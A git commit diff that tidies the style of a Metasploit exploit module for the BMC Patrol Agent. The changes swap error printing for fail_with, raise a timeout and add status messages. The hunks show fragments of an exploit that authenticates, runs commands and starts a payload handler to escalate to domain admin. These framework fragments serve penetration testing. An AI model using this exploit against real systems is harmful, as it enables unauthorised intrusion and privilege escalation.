Style police :P

rwincey 2019-02-13 00:35:54 -05:00
parent b55fdc7323
commit e716c24f2d
1 changed files with 25 additions and 47 deletions


@ -144,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
of the provided user is correct. This also means if the software is running on a of the provided user is correct. This also means if the software is running on a
domain controller, it can be used to escalate from a normal domain user to domain domain controller, it can be used to escalate from a normal domain user to domain
admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
powershell to execute the payload. powershell to execute the payload. The powershell version tends to timeout on
the first run so it may take multiple tries.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -189,6 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
def cleanup def cleanup
disconnect disconnect
print_status("Disconnected from BMC Patrol Agent.")
@inflater.close @inflater.close
@deflater.close @deflater.close
super super
@ -196,10 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
def get_target_os( srv_info_msg ) def get_target_os( srv_info_msg )
lines = srv_info_msg.split("\n") lines = srv_info_msg.split("\n")
if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}" fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
print_error("Invalid server info msg.")
return
end
os = $nil os = $nil
ver = $nil ver = $nil
@ -213,23 +212,20 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
end end
return [os,ver] [os,ver]
end end
def get_cmd_output( cmd_output_msg ) def get_cmd_output( cmd_output_msg )
lines = cmd_output_msg.split("\n") lines = cmd_output_msg.split("\n")
if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}" fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
print_error("Invalid command output msg.")
return
end
#Parse out command results #Parse out command results
idx_start = cmd_output_msg.index("Result\x00") idx_start = cmd_output_msg.index("Result\x00")
idx_end = cmd_output_msg.index("RemPsl_user") idx_end = cmd_output_msg.index("RemPsl_user")
output = cmd_output_msg[idx_start+7..idx_end-1] output = cmd_output_msg[idx_start+7..idx_end-1]
return output output
end end
def exploit def exploit
@ -243,13 +239,14 @@ class MetasploitModule < Msf::Exploit::Remote
#Configure the payload handler #Configure the payload handler
payload_instance.exploit_config = { payload_instance.exploit_config = {
'active_timeout' => 180 'active_timeout' => 300
} }
# Set up the payload handlers #Setup the payload handler
payload_instance.setup_handler payload_instance.setup_handler
# Start the payload handler #Start the payload handler
payload_instance.start_handler payload_instance.start_handler
end end
#Initialize zlib objects #Initialize zlib objects
@ -263,45 +260,29 @@ class MetasploitModule < Msf::Exploit::Remote
#Create session msg #Create session msg
create_session create_session
ret_data = receive_msg ret_data = receive_msg
if ret_data == $nil fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data == $nil
print_error("Failed to receive session confirmation. Aborting.")
return
end
ret_len = ret_data.length
#Authenticate #Authenticate
authenticate_user(datastore['USER'], datastore['PASSWORD']) authenticate_user(datastore['USER'], datastore['PASSWORD'])
#receive the authentication response #receive the authentication response
ret_data = receive_msg() ret_data = receive_msg
if ret_data == $nil fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data == $nil
print_error("Failed to receive authentication response. Aborting.")
return
end
ret_msg = process_response( ret_data ) ret_msg = process_response(ret_data)
if ret_msg =~ /logged in/ if ret_msg =~ /logged in/
print_status("Successfully authenticated user.") print_status("Successfully authenticated user.")
else else
print_error("Login failed. Aborting.") fail_with(Failure::UnexpectedReply, "Login failed. Aborting.")
return
end end
#receive the server info #receive the server info
ret_data = receive_msg() ret_data = receive_msg
if ret_data == $nil fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data == $nil
print_error("Failed to receive server info msg. Aborting.") srv_info = process_response(ret_data)
return
end
srv_info = process_response( ret_data )
#Get the target's OS from their info msg #Get the target's OS from their info msg
target_os = get_target_os(srv_info) target_os = get_target_os(srv_info)
if target_os == $nil
print_error("Invalid server info msg. Aborting.")
return
end
# When using auto targeting, MSF selects the Windows meterpreter as the default payload. # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload. # Fail if this is the case and ask the user to select an appropriate payload.
@ -324,19 +305,17 @@ class MetasploitModule < Msf::Exploit::Remote
run_cmd(command) run_cmd(command)
#receive command confirmation #receive command confirmation
ret_data = receive_msg() ret_data = receive_msg
if ret_data != $nil if ret_data != $nil
process_response( ret_data ) process_response(ret_data)
end end
#receive command output #receive command output
ret_data = receive_msg() ret_data = receive_msg
if ret_data != $nil and datastore['CMD'] != $nil if ret_data != $nil and datastore['CMD'] != $nil
cmd_result_data = process_response( ret_data ) cmd_result_data = process_response( ret_data )
cmd_result = get_cmd_output(cmd_result_data) cmd_result = get_cmd_output(cmd_result_data)
if cmd_result != $nil print_status( "Output:\n#{cmd_result}" )
print_status( "Output:\n#{cmd_result}" )
end
end end
#Handle the shell #Handle the shell
@ -344,7 +323,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def receive_msg() def receive_msg
header = sock.get_once(6) header = sock.get_once(6)
if header == $nil if header == $nil
@ -367,7 +346,6 @@ class MetasploitModule < Msf::Exploit::Remote
def send_msg(type, compression, data) def send_msg(type, compression, data)
ret_len = 0
data_len = data.length data_len = data.length
buf = [data_len].pack('N') buf = [data_len].pack('N')
@ -1078,7 +1056,7 @@ class MetasploitModule < Msf::Exploit::Remote
def des_string_to_key( key_buf_str ) def des_string_to_key( key_buf_str )
init_des() init_des
temp_key1 = Array.new(8,0) temp_key1 = Array.new(8,0)
temp_key2 = Array.new(8,0) temp_key2 = Array.new(8,0)